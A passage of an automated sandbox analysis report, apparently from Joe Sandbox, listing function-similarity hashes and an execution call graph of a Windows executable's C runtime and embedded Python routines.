                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                  • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                  • Instruction ID: 6ba6c3ac0b642c85072146fdca1b7b62a33fa72c31c3cb467e4fd2455bcc4bc1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44117022B14F068AEB00DF60E8542B977A4FB59B68F840E35DE2D577A4DF7CE1988350
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                                  • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                  • Instruction ID: e77e3916d363edac1704f1e1fe6974cc0d284bda638f8e80cde82d465aa19813
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B411612A18A8246FB64AB2594017BAEF50EF80BB4F944235EF5C16BD5DF3CF4858710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102D835E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C6E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D9C58: GetLastError.KERNEL32(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C78
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7102CBEC5), ref: 00007FF7102D837C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe
                                                                                                                                                                                                  • API String ID: 3580290477-898561748
                                                                                                                                                                                                  • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                  • Instruction ID: 09cd026aee755dcbd4866e7def9b75b03ef453d24cfc354720125d677764a895
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57417033A08F5285E754FF25A4810BCAB94FB45BA0BD54039EA4E43B85DF7CF8898320
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: .$:
                                                                                                                                                                                                  • API String ID: 2020911589-4202072812
                                                                                                                                                                                                  • Opcode ID: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                                                                                                                                                                  • Instruction ID: 4b78896f81df8fe9737094e202c50a500f7e12d1f99938baea5639263dfe29d9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE414D23F08F5298FB51ABB198516FC6AB46F14768F940035DE4D67B89DF38F84A8324
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                                  • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                  • Instruction ID: c021985af972cfd90e085281a32192e84863a5a3c0197a81d1e7eea70c2a591b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9141B423B18A85C5DB21AF25E8443AABB60FB987A4F904035EE4D87B98DF3CE445C710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                                  • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                                                                                  • Instruction ID: 949a81af9528a8a87a4adb6088fcd41ae1d341a57f5be54c0a7e0f5be43ec9de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E21CE63B08A8182EF60BB15D4542BEABA2FB84B94FC54035DA8C53784CF7CFD498760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                  • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                  • Instruction ID: 7f73d800b3a425f4758f60ec51b0d0ff776963957c08862f785d087010eaf67f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3118B32618F8182EB618B24F50026ABBE0FB88B94F984230DF8C07769DF3CE455CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                                                  • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                  • Instruction ID: b52549dab8f6fa18d36ee9f29823605c4451c89bd64dcef07c637251050dbbb5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01842291CA4386FB61BF60946167EAB90EF48728FC00135D54D46791DF7CF948CB28

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:2.5%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:809
                                                                                                                                                                                                  Total number of Limit Nodes:25
                                                                                                                                                                                                  execution_graph 55522 7ff7102c2d00 55523 7ff7102c2d10 55522->55523 55524 7ff7102c2d61 55523->55524 55525 7ff7102c2d4b 55523->55525 55527 7ff7102c2d81 55524->55527 55537 7ff7102c2d97 __std_exception_copy 55524->55537 55578 7ff7102c25f0 53 API calls _log10_special 55525->55578 55579 7ff7102c25f0 53 API calls _log10_special 55527->55579 55532 7ff7102c3069 55595 7ff7102c25f0 53 API calls _log10_special 55532->55595 55535 7ff7102c3053 55594 7ff7102c25f0 53 API calls _log10_special 55535->55594 55537->55532 55537->55535 55538 7ff7102c302d 55537->55538 55540 7ff7102c2f27 55537->55540 55549 7ff7102c2d57 __std_exception_copy 55537->55549 55550 7ff7102c1440 55537->55550 55574 7ff7102c1bf0 55537->55574 55593 7ff7102c25f0 53 API calls _log10_special 55538->55593 55541 7ff7102c2f93 55540->55541 55589 7ff7102d9714 37 API calls 2 library calls 55540->55589 55543 7ff7102c2fb0 55541->55543 55544 7ff7102c2fbe 55541->55544 55590 7ff7102d9714 37 API calls 2 library calls 55543->55590 55591 7ff7102c2af0 37 API calls 55544->55591 55547 7ff7102c2fbc 55592 7ff7102c2470 54 API calls __std_exception_copy 55547->55592 55580 7ff7102cb870 55549->55580 55596 7ff7102c3f70 55550->55596 55553 7ff7102c148c 55606 7ff7102cf9f4 55553->55606 55554 7ff7102c146b 55632 7ff7102c25f0 53 API calls _log10_special 55554->55632 55557 7ff7102c147b 55557->55537 55558 7ff7102c14a1 55559 7ff7102c14c1 55558->55559 55560 7ff7102c14a5 55558->55560 55562 7ff7102c14f1 55559->55562 55563 7ff7102c14d1 55559->55563 55633 7ff7102c2760 53 API calls 2 library calls 55560->55633 55566 7ff7102c14f7 55562->55566 55569 7ff7102c150a 55562->55569 55634 7ff7102c2760 53 API calls 2 library calls 55563->55634 55610 7ff7102c11f0 55566->55610 55567 7ff7102c1584 55567->55537 55571 7ff7102c1596 55569->55571 55573 7ff7102c14bc __std_exception_copy 55569->55573 55635 7ff7102cf6bc 55569->55635 55638 7ff7102c2760 53 API calls 2 library calls 55571->55638 55628 7ff7102cf36c 55573->55628 55575 7ff7102c1c15 55574->55575 55880 7ff7102d3ca4 55575->55880 55578->55549 55579->55549 55581 7ff7102cb879 55580->55581 55582 7ff7102c2f1a 55581->55582 55583 7ff7102cbc00 IsProcessorFeaturePresent 55581->55583 55584 7ff7102cbc18 55583->55584 55907 7ff7102cbdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 55584->55907 55586 7ff7102cbc2b 55908 7ff7102cbbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55586->55908 55589->55541 55590->55547 55591->55547 55592->55549 55593->55549 55594->55549 55595->55549 55597 7ff7102c3f7c 55596->55597 55639 7ff7102c86b0 55597->55639 55599 7ff7102c3fa4 55600 7ff7102c86b0 2 API calls 55599->55600 55601 7ff7102c3fb7 55600->55601 55644 7ff7102d52a4 55601->55644 55604 7ff7102cb870 _log10_special 8 API calls 55605 7ff7102c1463 55604->55605 55605->55553 55605->55554 55607 7ff7102cfa24 55606->55607 55815 7ff7102cf784 55607->55815 55609 7ff7102cfa3d 55609->55558 55611 7ff7102c1248 55610->55611 55612 7ff7102c124f 55611->55612 55613 7ff7102c1277 55611->55613 55832 7ff7102c25f0 53 API calls _log10_special 55612->55832 55616 7ff7102c1291 55613->55616 55617 7ff7102c12ad 55613->55617 55615 7ff7102c1262 55615->55573 55833 7ff7102c2760 53 API calls 2 library calls 55616->55833 55619 7ff7102c12bf 55617->55619 55627 7ff7102c12db memcpy_s 55617->55627 55834 7ff7102c2760 53 API calls 2 library calls 55619->55834 55621 7ff7102cf6bc _fread_nolock 53 API calls 55621->55627 55622 7ff7102cf430 37 API calls 55622->55627 55623 7ff7102c12a8 __std_exception_copy 55623->55573 55624 7ff7102c139f 55835 7ff7102c25f0 53 API calls _log10_special 55624->55835 55627->55621 55627->55622 55627->55623 55627->55624 55828 7ff7102cfdfc 55627->55828 55629 7ff7102cf39c 55628->55629 55852 7ff7102cf148 55629->55852 55631 7ff7102cf3b5 55631->55567 55632->55557 55633->55573 55634->55573 55864 7ff7102cf6dc 55635->55864 55638->55573 55640 7ff7102c86d2 MultiByteToWideChar 55639->55640 55641 7ff7102c86f6 55639->55641 55640->55641 55643 7ff7102c870c __std_exception_copy 55640->55643 55642 7ff7102c8713 MultiByteToWideChar 55641->55642 55641->55643 55642->55643 55643->55599 55645 7ff7102d51d8 55644->55645 55646 7ff7102d51fe 55645->55646 55648 7ff7102d5231 55645->55648 55675 7ff7102d43f4 11 API calls _get_daylight 55646->55675 55650 7ff7102d5244 55648->55650 55651 7ff7102d5237 55648->55651 55649 7ff7102d5203 55676 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55649->55676 55663 7ff7102d9f38 55650->55663 55677 7ff7102d43f4 11 API calls _get_daylight 55651->55677 55655 7ff7102c3fc6 55655->55604 55657 7ff7102d5265 55670 7ff7102df1dc 55657->55670 55658 7ff7102d5258 55678 7ff7102d43f4 11 API calls _get_daylight 55658->55678 55661 7ff7102d5278 55679 7ff7102d4788 LeaveCriticalSection 55661->55679 55680 7ff7102df5e8 EnterCriticalSection 55663->55680 55665 7ff7102d9f4f 55666 7ff7102d9fac 19 API calls 55665->55666 55667 7ff7102d9f5a 55666->55667 55668 7ff7102df648 _isindst LeaveCriticalSection 55667->55668 55669 7ff7102d524e 55668->55669 55669->55657 55669->55658 55681 7ff7102deed8 55670->55681 55672 7ff7102df236 55672->55661 55675->55649 55676->55655 55677->55655 55678->55655 55682 7ff7102def13 __vcrt_FlsAlloc 55681->55682 55691 7ff7102df0da 55682->55691 55696 7ff7102d6d4c 51 API calls 3 library calls 55682->55696 55684 7ff7102df1b1 55700 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55684->55700 55686 7ff7102df0e3 55686->55672 55693 7ff7102e6064 55686->55693 55688 7ff7102df145 55688->55691 55697 7ff7102d6d4c 51 API calls 3 library calls 55688->55697 55690 7ff7102df164 55690->55691 55698 7ff7102d6d4c 51 API calls 3 library calls 55690->55698 55691->55686 55699 7ff7102d43f4 11 API calls _get_daylight 55691->55699 55701 7ff7102e5664 55693->55701 55696->55688 55697->55690 55698->55691 55699->55684 55700->55686 55702 7ff7102e567b 55701->55702 55704 7ff7102e5699 55701->55704 55755 7ff7102d43f4 11 API calls _get_daylight 55702->55755 55704->55702 55706 7ff7102e56b5 55704->55706 55705 7ff7102e5680 55756 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55705->55756 55712 7ff7102e5c74 55706->55712 55710 7ff7102e568c 55710->55672 55758 7ff7102e59a8 55712->55758 55715 7ff7102e5d01 55777 7ff7102d7830 55715->55777 55716 7ff7102e5ce9 55789 7ff7102d43d4 11 API calls _get_daylight 55716->55789 55735 7ff7102e5cee 55790 7ff7102d43f4 11 API calls _get_daylight 55735->55790 55748 7ff7102e56e0 55748->55710 55757 7ff7102d7808 LeaveCriticalSection 55748->55757 55755->55705 55756->55710 55759 7ff7102e59d4 55758->55759 55767 7ff7102e59ee 55758->55767 55759->55767 55802 7ff7102d43f4 11 API calls _get_daylight 55759->55802 55761 7ff7102e59e3 55803 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55761->55803 55763 7ff7102e5abd 55776 7ff7102e5b1a 55763->55776 55808 7ff7102d8e90 37 API calls 2 library calls 55763->55808 55764 7ff7102e5a6c 55764->55763 55806 7ff7102d43f4 11 API calls _get_daylight 55764->55806 55767->55764 55804 7ff7102d43f4 11 API calls _get_daylight 55767->55804 55768 7ff7102e5ab2 55807 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55768->55807 55770 7ff7102e5b16 55770->55776 55809 7ff7102d9c10 IsProcessorFeaturePresent 55770->55809 55772 7ff7102e5a61 55805 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55772->55805 55776->55715 55776->55716 55814 7ff7102df5e8 EnterCriticalSection 55777->55814 55789->55735 55790->55748 55802->55761 55803->55767 55804->55772 55805->55764 55806->55768 55807->55763 55808->55770 55810 7ff7102d9c23 55809->55810 55813 7ff7102d9924 14 API calls 3 library calls 55810->55813 55812 7ff7102d9c3e GetCurrentProcess TerminateProcess 55813->55812 55816 7ff7102cf7ee 55815->55816 55817 7ff7102cf7ae 55815->55817 55816->55817 55818 7ff7102cf7fa 55816->55818 55827 7ff7102d9b24 37 API calls 2 library calls 55817->55827 55826 7ff7102d477c EnterCriticalSection 55818->55826 55821 7ff7102cf7d5 55821->55609 55822 7ff7102cf7ff 55823 7ff7102cf908 71 API calls 55822->55823 55824 7ff7102cf811 55823->55824 55825 7ff7102d4788 _fread_nolock LeaveCriticalSection 55824->55825 55825->55821 55827->55821 55829 7ff7102cfe2c 55828->55829 55836 7ff7102cfb4c 55829->55836 55831 7ff7102cfe4a 55831->55627 55832->55615 55833->55623 55834->55623 55835->55623 55837 7ff7102cfb6c 55836->55837 55838 7ff7102cfb99 55836->55838 55837->55838 55839 7ff7102cfb76 55837->55839 55840 7ff7102cfba1 55837->55840 55838->55831 55850 7ff7102d9b24 37 API calls 2 library calls 55839->55850 55843 7ff7102cfa8c 55840->55843 55851 7ff7102d477c EnterCriticalSection 55843->55851 55845 7ff7102cfaa9 55846 7ff7102cfacc 74 API calls 55845->55846 55847 7ff7102cfab2 55846->55847 55848 7ff7102d4788 _fread_nolock LeaveCriticalSection 55847->55848 55849 7ff7102cfabd 55848->55849 55849->55838 55850->55838 55853 7ff7102cf163 55852->55853 55854 7ff7102cf191 55852->55854 55863 7ff7102d9b24 37 API calls 2 library calls 55853->55863 55856 7ff7102cf183 55854->55856 55862 7ff7102d477c EnterCriticalSection 55854->55862 55856->55631 55858 7ff7102cf1a8 55859 7ff7102cf1c4 72 API calls 55858->55859 55860 7ff7102cf1b4 55859->55860 55861 7ff7102d4788 _fread_nolock LeaveCriticalSection 55860->55861 55861->55856 55863->55856 55865 7ff7102cf6d4 55864->55865 55866 7ff7102cf706 55864->55866 55865->55569 55866->55865 55867 7ff7102cf715 __scrt_get_show_window_mode 55866->55867 55868 7ff7102cf752 55866->55868 55878 7ff7102d43f4 11 API calls _get_daylight 55867->55878 55877 7ff7102d477c EnterCriticalSection 55868->55877 55870 7ff7102cf75a 55872 7ff7102cf45c _fread_nolock 51 API calls 55870->55872 55874 7ff7102cf771 55872->55874 55873 7ff7102cf72a 55879 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55873->55879 55876 7ff7102d4788 _fread_nolock LeaveCriticalSection 55874->55876 55876->55865 55878->55873 55879->55865 55883 7ff7102d3cfe 55880->55883 55881 7ff7102d3d23 55898 7ff7102d9b24 37 API calls 2 library calls 55881->55898 55882 7ff7102d3d5f 55899 7ff7102d1f30 49 API calls _invalid_parameter_noinfo 55882->55899 55883->55881 55883->55882 55886 7ff7102d3d4d 55888 7ff7102cb870 _log10_special 8 API calls 55886->55888 55887 7ff7102d3e3c 55889 7ff7102d9c58 __free_lconv_mon 11 API calls 55887->55889 55891 7ff7102c1c38 55888->55891 55889->55886 55890 7ff7102d3df6 55890->55887 55892 7ff7102d3e60 55890->55892 55893 7ff7102d3e11 55890->55893 55896 7ff7102d3e08 55890->55896 55891->55537 55892->55887 55894 7ff7102d3e6a 55892->55894 55900 7ff7102d9c58 55893->55900 55897 7ff7102d9c58 __free_lconv_mon 11 API calls 55894->55897 55896->55887 55896->55893 55897->55886 55898->55886 55899->55890 55901 7ff7102d9c5d RtlFreeHeap 55900->55901 55905 7ff7102d9c8c 55900->55905 55902 7ff7102d9c78 GetLastError 55901->55902 55901->55905 55903 7ff7102d9c85 __free_lconv_mon 55902->55903 55906 7ff7102d43f4 11 API calls _get_daylight 55903->55906 55905->55886 55906->55905 55907->55586 55909 7ffef65528c0 PyObject_CallObject 55910 7ffef65529b2 55909->55910 55911 7ffef65528f8 PyMem_Malloc 55909->55911 55912 7ffef65579ea PyErr_NoMemory 55911->55912 55915 7ffef655291a 55911->55915 55913 7ffef65579f8 55912->55913 55914 7ffef65579fe _Py_Dealloc 55913->55914 55922 7ffef65529a9 55913->55922 55914->55922 55917 7ffef655296e PyDict_Update 55915->55917 55915->55922 55916 7ffef6557a23 _Py_Dealloc 55916->55910 55917->55913 55918 7ffef6552987 55917->55918 55919 7ffef65529a1 55918->55919 55920 7ffef655299b _Py_Dealloc 55918->55920 55923 7ffef65529d0 20 API calls 55919->55923 55920->55919 55922->55910 55922->55916 55923->55922 55924 7ff7102dec9c 55925 7ff7102dee8e 55924->55925 55927 7ff7102decde _isindst 55924->55927 55971 7ff7102d43f4 11 API calls _get_daylight 55925->55971 55927->55925 55930 7ff7102ded5e _isindst 55927->55930 55928 7ff7102cb870 _log10_special 8 API calls 55929 7ff7102deea9 55928->55929 55945 7ff7102e54a4 55930->55945 55935 7ff7102deeba 55936 7ff7102d9c10 _isindst 17 API calls 55935->55936 55938 7ff7102deece 55936->55938 55942 7ff7102dedbb 55944 7ff7102dee7e 55942->55944 55970 7ff7102e54e8 37 API calls _isindst 55942->55970 55944->55928 55946 7ff7102e54b3 55945->55946 55947 7ff7102ded7c 55945->55947 55972 7ff7102df5e8 EnterCriticalSection 55946->55972 55952 7ff7102e48a8 55947->55952 55949 7ff7102e54bb 55950 7ff7102e54cc 55949->55950 55951 7ff7102e5314 55 API calls 55949->55951 55951->55950 55953 7ff7102e48b1 55952->55953 55957 7ff7102ded91 55952->55957 55973 7ff7102d43f4 11 API calls _get_daylight 55953->55973 55955 7ff7102e48b6 55974 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55955->55974 55957->55935 55958 7ff7102e48d8 55957->55958 55959 7ff7102e48e1 55958->55959 55960 7ff7102deda2 55958->55960 55975 7ff7102d43f4 11 API calls _get_daylight 55959->55975 55960->55935 55964 7ff7102e4908 55960->55964 55962 7ff7102e48e6 55976 7ff7102d9bf0 37 API calls _invalid_parameter_noinfo 55962->55976 55965 7ff7102e4911 55964->55965 55966 7ff7102dedb3 55964->55966 55977 7ff7102d43f4 11 API calls _get_daylight 55965->55977 55966->55935 55966->55942 55968 7ff7102e4916 55978 